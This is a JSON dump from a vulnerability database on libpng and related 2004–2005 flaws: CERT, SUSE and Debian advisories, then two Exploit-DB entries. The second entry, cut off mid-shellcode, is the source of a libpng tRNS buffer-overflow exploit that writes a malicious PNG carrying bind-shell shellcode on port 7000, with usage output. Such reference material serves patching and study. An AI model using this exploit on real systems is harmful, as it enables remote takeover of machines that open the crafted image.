Do not click on unsolicited links received in email, instant messages, web forums, or internet relay chat (IRC) channels. Type URLs directly into the browser to avoid these misleading links. While these are generally good security practices, following these behaviors will not prevent exploitation of this vulnerability in all cases, particularly if a trusted site has been compromised or allows cross-site scripting. \n--- \n \n### Vendor Information\n\n189754\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nUpdated: June 14, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease refer to <http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23189754 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>\n\n### Acknowledgements\n\nThis vulnerability was reported in Microsoft Security Bulletin MS05-025. Microsoft credits Mark Dowd of ISS X-Force for providing information regarding this vulnerability. 
\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-1211](<http://web.nvd.nist.gov/vuln/detail/CVE-2005-1211>) \n---|--- \n**Severity Metric:** | 22.50 \n**Date Public:** | 2005-06-14 \n**Date First Published:** | 2005-06-14 \n**Date Last Updated: ** | 2005-06-27 12:22 UTC \n**Document Revision: ** | 50 \n", "modified": "2005-06-27T12:22:00", "published": "2005-06-14T00:00:00", "id": "VU:189754", "href": "https://www.kb.cert.org/vuls/id/189754", "type": "cert", "title": "Microsoft Internet Explorer buffer overflow in PNG image rendering component", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:51:43", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0500", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0557", "CVE-2004-0598"], "description": "Several different security vulnerabilities were found in the PNG library which is used by applications to support the PNG image format.", "edition": 1, "modified": "2004-08-04T15:12:06", "published": "2004-08-04T15:12:06", "id": "SUSE-SA:2004:023", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-08/msg00005.html", "type": "suse", "title": "remote system compromise in libpng", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:10:59", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0765", "CVE-2004-0762", "CVE-2004-0758", "CVE-2004-0691", "CVE-2004-0718", "CVE-2004-0764", "CVE-2004-0815", "CVE-2004-0757", "CVE-2004-0599", "CVE-2004-0746", "CVE-2004-0597", "CVE-2004-0760", "CVE-2004-0598", "CVE-2004-0722", "CVE-2004-0759", "CVE-2004-0763", "CVE-2004-0761"], "description": "The Samba server, which allows to share files and resources via the SMB/CIFS protocol, contains a bug in the sanitation code of path names which allows remote attackers to access files outside of the defined share. 
In order to access these files, they must be readable by the account used for the SMB session. CAN-2004-0815 has been assigned to this issue.\n#### Solution\nAs a temporary workaround you can set the `wide links = no` option in smb.conf and restart the samba server. However, an update is recommended nevertheless.", "edition": 1, "modified": "2004-10-05T14:57:32", "published": "2004-10-05T14:57:32", "id": "SUSE-SA:2004:035", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-10/msg00005.html", "type": "suse", "title": "remote file disclosure in samba", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0765", "CVE-2004-0762", "CVE-2004-0758", "CVE-2004-0718", "CVE-2004-0748", "CVE-2004-0764", "CVE-2004-0757", "CVE-2004-0597", "CVE-2004-0760", "CVE-2004-0722", "CVE-2004-0759", "CVE-2004-0751", "CVE-2004-0763", "CVE-2004-0761"], "description": "The mod_ssl apache module, as part of our apache2 package, enables the apache webserver to handle the HTTPS protocol. Within the mod_ssl module, two Denial of Service conditions in the input filter have been found. 
The CVE project assigned the identifiers CAN-2004-0748 and CAN-2004-0751 to these issues.\n#### Solution\nAs a temporary workaround you may disable the mod_ssl module in your apache configuration and restart the apache process without SSL support.", "edition": 1, "modified": "2004-09-06T13:51:41", "published": "2004-09-06T13:51:41", "id": "SUSE-SA:2004:030", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-09/msg00009.html", "title": "remote DoS condition in apache2", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:41:56", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0558", "CVE-2004-0765", "CVE-2004-0762", "CVE-2004-0758", "CVE-2004-0827", "CVE-2004-0718", "CVE-2004-0764", "CVE-2004-0757", "CVE-2004-0805", "CVE-2004-0801", "CVE-2004-0597", "CVE-2004-0760", "CVE-2004-0722", "CVE-2004-0759", "CVE-2004-0763", "CVE-2004-0761"], "description": "The Common Unix Printing System (CUPS) enables local and remote users to obtain printing functionality via the Internet Printing Protocol (IPP). Alvaro Martinez Echevarria has found a remote Denial of Service condition within CUPS which allows remote users to make the cups server unresponsive. Additionally the SUSE Security Team has discovered a flaw in the foomatic-rip print filter which is commonly installed along with cups. It allows remote attackers who are listed in the printing ACLs to execute arbitrary commands as the printing user 'lp'.\n#### Solution\nIf you use CUPS, we recommend an update in any case. 
Additionally the IPP port (TCP port 631) should be firewalled and the printing ACLs should be set up in a way that reflects the local security policy.", "edition": 1, "modified": "2004-09-15T14:45:26", "published": "2004-09-15T14:45:26", "id": "SUSE-SA:2004:031", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-09/msg00010.html", "title": "remote code execution in cups", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:06", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0788", "CVE-2004-0765", "CVE-2004-0762", "CVE-2004-0758", "CVE-2004-0784", "CVE-2004-0718", "CVE-2004-0764", "CVE-2004-0757", "CVE-2004-0494", "CVE-2004-0782", "CVE-2004-0783", "CVE-2004-0597", "CVE-2004-0722", "CVE-2004-0832", "CVE-2004-0785", "CVE-2004-0759", "CVE-2004-0754", "CVE-2004-0763", "CVE-2004-0761"], "description": "gdk-pixbuf is an image loading and rendering library mostly used by GTK and GNOME applications. It is distributed as a separate package for gtk1 and integrated into the gtk2 package. Chris Evans has discovered a heap-based overflow, a stack-based overflow and an integer overflow in the XPM and ICO loaders of those libraries. 
The overflows can be exploited by tricking an application into displaying a malformed image, causing it to crash or to execute code.\n#### Solution\nThere is no known workaround; please install the update packages.", "edition": 1, "modified": "2004-09-17T10:02:50", "published": "2004-09-17T10:02:50", "id": "SUSE-SA:2004:033", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-09/msg00012.html", "title": "remote code execution in gtk2, gdk-pixbuf", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:39", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0688", "CVE-2004-0765", "CVE-2004-1170", "CVE-2004-0687", "CVE-2004-0762", "CVE-2004-0758", "CVE-2004-0784", "CVE-2004-0807", "CVE-2004-0718", "CVE-2004-0764", "CVE-2004-0757", "CVE-2004-0494", "CVE-2004-0808", "CVE-2004-0597", "CVE-2004-0722", "CVE-2004-0832", "CVE-2004-0785", "CVE-2004-0759", "CVE-2004-0754", "CVE-2004-0763", "CVE-2004-0761"], "description": "Chris Evans reported three vulnerabilities in libXpm which can be exploited remotely by providing malformed XPM image files. The function xpmParseColors() is vulnerable to an integer overflow and a stack-based buffer overflow. The functions ParseAndPutPixels() and ParsePixels() are also vulnerable to a stack-based buffer overflow. 
Additionally Matthieu Herrb found two one-byte buffer overflows.\n#### Solution\nThere is no known workaround.", "edition": 1, "modified": "2004-09-17T13:37:17", "published": "2004-09-17T13:37:17", "id": "SUSE-SA:2004:034", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-09/msg00013.html", "type": "suse", "title": "remote command execution in XFree86-libs, xshared", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:57:20", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0788", "CVE-2004-0786", "CVE-2004-0765", "CVE-2004-0747", "CVE-2004-0762", "CVE-2004-0758", "CVE-2004-0784", "CVE-2004-0807", "CVE-2004-0718", "CVE-2004-0764", "CVE-2004-0757", "CVE-2004-0494", "CVE-2004-0808", "CVE-2004-0782", "CVE-2004-0783", "CVE-2004-0597", "CVE-2004-0722", "CVE-2004-0832", "CVE-2004-0785", "CVE-2004-0759", "CVE-2004-0754", "CVE-2004-0763", "CVE-2004-0761"], "description": "The Apache daemon is running on most of the web-servers used in the Internet today. The Red Hat ASF Security-Team and the Swedish IT Incident Center within the National Post and Telecom Agency (SITIC) have each found a bug in apache2. The first vulnerability appears in the apr_uri_parse() function while handling IPv6 addresses. The affected code passes a negative length argument to the memcpy() function. On BSD systems this can lead to remote command execution due to the nature of the memcpy() implementation. On Linux this bug will result in a remote denial-of-service condition. The second bug is a local buffer overflow that occurs while expanding ${ENVVAR} in the .htaccess and httpd.conf file. 
Neither file is writable by normal users by default.\n#### Solution\nThere is no known workaround.", "edition": 1, "modified": "2004-09-15T15:46:39", "published": "2004-09-15T15:46:39", "id": "SUSE-SA:2004:032", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-09/msg00011.html", "title": "remote denial-of-service in apache2", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:14:47", "bulletinFamily": "unix", "cvelist": ["CVE-2002-1363", "CVE-2004-0768", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 536-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nAugust 4th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : libpng\nVulnerability : several\nProblem-Type : local/remote\nDebian-specific: no\nCVE Ids : CAN-2004-0597 CAN-2004-0598 CAN-2004-0599 CAN-2004-0768\n\nChris Evans discovered several vulnerabilities in libpng:\n\n CAN-2004-0597 - Multiple buffer overflows exist, including when\n handling transparency chunk data, which could be exploited to cause\n arbitrary code to be executed when a specially crafted PNG image is\n processed\n\n CAN-2004-0598 - Multiple NULL pointer dereferences in\n png_handle_iCPP() and elsewhere could be exploited to cause an\n application to crash when a specially crafted PNG image is processed\n\n CAN-2004-0599 - Multiple integer overflows in png_handle_sPLT(),\n png_read_png() functions and elsewhere could be exploited to cause an\n application to crash, or potentially arbitrary code to be executed,\n when a specially crafted PNG image is processed\n\nIn addition, a bug related to CAN-2002-1363 was fixed:\n\n CAN-2004-0768 - A buffer overflow could be caused by incorrect\n calculation 
of buffer offsets, possibly leading to the execution of\n arbitrary code\n\nFor the current stable distribution (woody), these problems have been\nfixed in libpng3 version 1.2.1-1.1.woody.7 and libpng version\n1.0.12-3.woody.7.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you update your libpng and libpng3 packages.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.0.12-3.woody.7.dsc\n Size/MD5 checksum: 579 28fa419216a24ee3bfc2379864cb08af\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.0.12-3.woody.7.diff.gz\n Size/MD5 checksum: 9742 75a375a67bb78301d9a9ebe821b3f2b2\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.0.12.orig.tar.gz\n Size/MD5 checksum: 481387 3329b745968e41f6f9e55a4d04a4964c\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7.dsc\n Size/MD5 checksum: 583 3976057544097db61b33f953b803d947\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7.diff.gz\n Size/MD5 checksum: 29676 0501708a687b71e449f81cd3e61868d6\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1.orig.tar.gz\n Size/MD5 checksum: 493105 75a21cbfae566158a0ac6d9f39087c4d\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_arm.deb\n Size/MD5 checksum: 108834 65c7d7fb818332e8c0a5948450289d6f\n 
http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_arm.deb\n Size/MD5 checksum: 241392 785d7cc63274c17c1b6f54020e55b047\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_arm.deb\n Size/MD5 checksum: 247654 8fcf3de4c503230ec009cd60d852ed8e\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_arm.deb\n Size/MD5 checksum: 112036 159d56f98ca67efae5b941c8c125f7fb\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_i386.deb\n Size/MD5 checksum: 107012 6c0c53769987b0e612315a27d426c31b\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_i386.deb\n Size/MD5 checksum: 226982 93ab2de59fd31cdd270220a9bf470aab\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_i386.deb\n Size/MD5 checksum: 233652 7a723facf934ca726426fcccbea044c1\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_i386.deb\n Size/MD5 checksum: 110350 aaa13f7b82894d332b0d93812eccf245\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_ia64.deb\n Size/MD5 checksum: 147182 a42677c2dc15d9c7e69084c794adb1f1\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_ia64.deb\n Size/MD5 checksum: 271760 3602ac433e9acb291264ac4631466b1b\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_ia64.deb\n Size/MD5 checksum: 278832 f40345e28c0a8090e3d5cc0da0c47c83\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_ia64.deb\n Size/MD5 checksum: 151492 b4cf01f0f5a4584a9cc91d37059e3a18\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_hppa.deb\n Size/MD5 checksum: 128592 c290efcf7bca64a59b95df9bd40ea7c4\n 
http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_hppa.deb\n Size/MD5 checksum: 262498 bba030d36b2453f50fc5f8dd502193db\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_hppa.deb\n Size/MD5 checksum: 269714 97f2cc65b004d72d2f736c444a5eca02\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_hppa.deb\n Size/MD5 checksum: 132710 ad103af06ba1fd04bfc820a7c9469a04\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_m68k.deb\n Size/MD5 checksum: 103914 0397515db7b83fe0788c11878ff2f6fe\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_m68k.deb\n Size/MD5 checksum: 220716 eedf1c5c86848604fffc678e2522047e\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_m68k.deb\n Size/MD5 checksum: 226396 825cf323e0b2a20d7059b41ac50b5ffe\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_m68k.deb\n Size/MD5 checksum: 106862 c9426ed19e5cf9d5ffa3f4e5ad9575ba\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_mips.deb\n Size/MD5 checksum: 108912 f28b7b28829c5eccfc1879bf24f30d01\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_mips.deb\n Size/MD5 checksum: 240572 aa9f0be614c9b9e83035927bca2780a0\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_mips.deb\n Size/MD5 checksum: 247046 950eb986e2da18540cac6871fa724ec8\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_mips.deb\n Size/MD5 checksum: 112238 45ba391f6604228a5712b3933cd7918d\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_mipsel.deb\n Size/MD5 checksum: 108792 e1c23a58af661142d961b2cb9067a8ad\n 
http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_mipsel.deb\n Size/MD5 checksum: 240484 205b79c80e9d5a90ba39ce297ca7ccf9\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_mipsel.deb\n Size/MD5 checksum: 247000 d7fab207f6240fa1c8cca2b626543910\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_mipsel.deb\n Size/MD5 checksum: 112174 60c7d64b2256f05f8eb132b8e386731e\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_powerpc.deb\n Size/MD5 checksum: 110254 ed1c9f3cb6cfc64467ae83251beb8b2d\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_powerpc.deb\n Size/MD5 checksum: 234680 a728d61a234b60b14d6876c0d7d460b5\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_powerpc.deb\n Size/MD5 checksum: 240742 ae4b57d50f8f6e8f88f18fdfde81c9a8\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_powerpc.deb\n Size/MD5 checksum: 113340 3014018db3169c617d958b71fa0e119d\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_s390.deb\n Size/MD5 checksum: 110286 1ba753d363eb45b3b768ae26ce19f9dc\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_s390.deb\n Size/MD5 checksum: 229436 8ca7796466613d780a3442d831544bf9\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_s390.deb\n Size/MD5 checksum: 235056 dcfc35ced743c453935dea5f4c6e8b92\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_s390.deb\n Size/MD5 checksum: 113376 2a42876c22f968ae435382110d27741c\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng2_1.0.12-3.woody.7_sparc.deb\n Size/MD5 checksum: 110312 f5db28252e4072d07f34da1b57bb2656\n 
http://security.debian.org/pool/updates/main/libp/libpng/libpng2-dev_1.0.12-3.woody.7_sparc.deb\n Size/MD5 checksum: 232132 32be4f2a4f7215f3760ac6ce7c222ab9\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng-dev_1.2.1-1.1.woody.7_sparc.deb\n Size/MD5 checksum: 237786 2d36e99aab38db959088a646bbf9455b\n http://security.debian.org/pool/updates/main/libp/libpng3/libpng3_1.2.1-1.1.woody.7_sparc.deb\n Size/MD5 checksum: 113744 d67df8af224bbcb817c7cb004ece5bf7\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "id": "DEBIAN:DSA-536-1:B4858", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html", "title": "[SECURITY] [DSA 536-1] New libpng, libpng3 packages fix multiple vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T12:18:43", "description": "LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit. CVE-2004-0597. Local exploit for linux platform", "published": "2004-08-13T00:00:00", "type": "exploitdb", "title": "LibPNG <= 1.2.5 png_jmpbuf Local Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0597"], "modified": "2004-08-13T00:00:00", "id": "EDB-ID:393", "href": "https://www.exploit-db.com/exploits/393/", "sourceData": "#include <stdio.h> \r\n#include <stdlib.h> \r\n#include \"png.h\" \r\n\r\n/* The png_jmpbuf() macro, used in error handling, became available in \r\n * libpng version 1.0.6. 
If you want to be able to run your code with older \r\n * versions of libpng, you must define the macro yourself (but only if it \r\n * is not already defined by libpng!). \r\n */ \r\n\r\n#ifndef png_jmpbuf \r\n#define png_jmpbuf(png_ptr) ((png_ptr)->jmpbuf) \r\n#endif \r\n#define ERROR 1 \r\n#define OK 0 \r\n\r\nint read_png(char *file_name) /* We need to open the file */ \r\n{ \r\n png_structp png_ptr; \r\n png_infop info_ptr; \r\n unsigned int sig_read = 0; \r\n png_uint_32 width, height; \r\n int bit_depth, color_type, interlace_type; \r\n FILE *fp; \r\n\r\n if ((fp = fopen(file_name, \"rb\")) == NULL) \r\n return (ERROR); \r\n\r\n /* Create and initialize the png_struct with the desired error handler \r\n * functions. If you want to use the default stderr and longjump method, \r\n * you can supply NULL for the last three parameters. We also supply the \r\n * the compiler header file version, so that we know if the application \r\n * was compiled with a compatible version of the library. REQUIRED \r\n */ \r\n png_ptr = png_create_read_struct(PNG_LIBPNG_VER_STRING, \r\n NULL, NULL, NULL); \r\n\r\n if (png_ptr == NULL) \r\n { \r\n fclose(fp); \r\n return (ERROR); \r\n } \r\n\r\n /* Allocate/initialize the memory for image information. REQUIRED. */ \r\n info_ptr = png_create_info_struct(png_ptr); \r\n if (info_ptr == NULL) \r\n { \r\n fclose(fp); \r\n png_destroy_read_struct(&png_ptr, png_infopp_NULL, png_infopp_NULL); \r\n return (ERROR); \r\n } \r\n\r\n /* Set error handling if you are using the setjmp/longjmp method (this is \r\n * the normal method of doing things with libpng). REQUIRED unless you \r\n * set up your own error handlers in the png_create_read_struct() earlier. 
\r\n */ \r\n if (setjmp(png_jmpbuf(png_ptr))) \r\n { \r\n /* Free all of the memory associated with the png_ptr and info_ptr */ \r\n png_destroy_read_struct(&png_ptr, &info_ptr, png_infopp_NULL); \r\n fclose(fp); \r\n /* If we get here, we had a problem reading the file */ \r\n return (ERROR); \r\n } \r\n\r\n /* Set up the input control if you are using standard C streams */ \r\n png_init_io(png_ptr, fp); \r\n\r\n /* If we have already read some of the signature */ \r\n png_set_sig_bytes(png_ptr, sig_read); \r\n\r\n /* \r\n * If you have enough memory to read in the entire image at once, \r\n * and you need to specify only transforms that can be controlled \r\n * with one of the PNG_TRANSFORM_* bits (this presently excludes \r\n * dithering, filling, setting background, and doing gamma \r\n * adjustment), then you can read the entire image (including \r\n * pixels) into the info structure with this call: \r\n */ \r\n png_read_png(png_ptr, info_ptr, PNG_TRANSFORM_IDENTITY, png_voidp_NULL); \r\n\r\n /* clean up after the read, and free any memory allocated - REQUIRED */ \r\n png_destroy_read_struct(&png_ptr, &info_ptr, png_infopp_NULL); \r\n\r\n /* close the file */ \r\n fclose(fp); \r\n\r\n /* that's it */ \r\n return (OK); \r\n} \r\n\r\nint main(int argc, char **argv) \r\n{ \r\n\r\n if(argc < 2){ \r\n fprintf(stderr, \"Usage: %s <png>n\", argv[0]); \r\n return EXIT_FAILURE; \r\n } \r\n\r\n if(read_png(argv[1]) != OK){ \r\n fprintf(stderr, \"Error reading pngn\"); \r\n return EXIT_FAILURE; \r\n } \r\n\r\n return 0; \r\n} \n\n// milw0rm.com [2004-08-13]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/393/"}, {"lastseen": "2016-01-31T12:18:12", "description": "LibPNG Graphics Library Remote Buffer Overflow Exploit. CVE-2004-0597. 
Remote exploit for linux platform", "published": "2004-08-11T00:00:00", "type": "exploitdb", "title": "LibPNG Graphics Library Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0597"], "modified": "2004-08-11T00:00:00", "id": "EDB-ID:389", "href": "https://www.exploit-db.com/exploits/389/", "sourceData": "/* \r\n * exploit for libpng, tested on version 1.2.5 \r\n * infamous42md AT hotpop DOT com \r\n * \r\n * shouts to mitakeet (hope u patched :D) \r\n * \r\n * [n00b_at_localho.outernet] ./po \r\n * Usage: ./po < retaddr > [ outfile ] \r\n * \r\n * -all u need to give is retaddr, the default file it creates is controlled by \r\n * the define below, or u can pass a diff outfile name on the command line. \r\n * the output is not an entire png, just enough to trigger the bug. i've also \r\n * included a simple program to test with. \r\n * \r\n * [n00b_at_localho.outernet] netstat -ant | grep 7000 \r\n * [n00b_at_localho.outernet] gcc pnouch.c -Wall -o po \r\n * [n00b_at_localho.outernet] gcc pngslap.c -o slapped -lz -lm lib/libpng12.so \r\n * [n00b_at_localho.outernet] ./po 0xbffff8b0 \r\n * [n00b_at_localho.outernet] ./slapped britnay_spares_pr0n.png \r\n * libpng warning: Missing PLTE before tRNS \r\n * libpng warning: tRNS: CRC error \r\n * [n00b_at_localho.outernet] netstat -ant | grep 7000 \r\n * tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN \r\n * \r\n */ \r\n#include <stdio.h> \r\n#include <sys/types.h> \r\n#include <netinet/in.h> \r\n#include <fcntl.h> \r\n#include <string.h> \r\n#include <unistd.h> \r\n#include <stdlib.h> \r\n \r\n\r\n#define OUTFILE \"britnay_spares_pr0n.png\" \r\n#define BS 0x1000 \r\n#define ALIGN 0 \r\n#define NOP 0x90 \r\n#define NNOPS 100 \r\n#define RETADDR_BYTES 300 \r\n \r\n\r\n#define die(x) do{ perror((x)); exit(EXIT_FAILURE);}while(0) \r\n \r\n\r\n/* identifies a file as a png */ \r\n#define MAJIC_LEN sizeof(png_majic) \r\nu_char png_majic[] = { 0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a }; \r\n 
\r\n\r\n/* \r\n * appears first, gives len/width/etc. important part is setting the color type \r\n * to 0x03, byte 10 of the IHDR data. that signfies that a PALLETE chunk should \r\n * be present. but we dont have one, and that is how the len check is bypassed. \r\n * the chunk len includes only the data, not the len field itself, or the id, or \r\n * the crc at the end. these bytes are stolen from the advisory. \r\n */ \r\n#define IHDR_LEN sizeof(png_ihdr) \r\nu_char png_ihdr[] = { 0x00, 0x00, 0x00, 0x0d, /* chunk len */ \r\n 0x49, 0x48, 0x44, 0x52, /* chunk id */ \r\n 0x00, 0x00, 0x00, 0x5b, 0x00, 0x00, 0x00, 0x45, \r\n 0x08, 0x03, 0x00, 0x00, 0x01, \r\n 0x65, 0x33, 0x5a, 0xd6 /* chunk crc */ \r\n}; \r\n \r\n\r\n/* \r\n * this is the tRNS type chunk, this is the evil chunk that actually contains \r\n * the shellcode. \r\n */ \r\n#define TRNS_LEN sizeof(png_trns_len_id) \r\nu_char png_trns_len_id[] = { 0x00, 0x00, 0x00, 0x00, /* chunk len filled in*/ \r\n 0x74, 0x52, 0x4e, 0x53 /* chunk id */ \r\n /* begin chunk data */ \r\n /* retaddr, NOPS, shellcode, CRC will follow */ \r\n}; \r\n \r\n\r\n/* call them shell code */ \r\n#define SHELL_LEN strlen(sc) \r\nchar sc[] = \r\n \"\\x31\\xc0\\x50\\x50\\x66\\xc7\\x44\\x24\\x02\\x1b\\x58\\xc6\\x04\\x24\\x02\\x89\\xe6\" \r\n \"\\xb0\\x02\\xcd\\x80\\x85\\xc0\\x74\\x08\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\\x50\" \r\n \"\\x6a\\x01\\x6a\\x02\\x89\\xe1\\x31\\xdb\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\xc5\\x6a\" \r\n 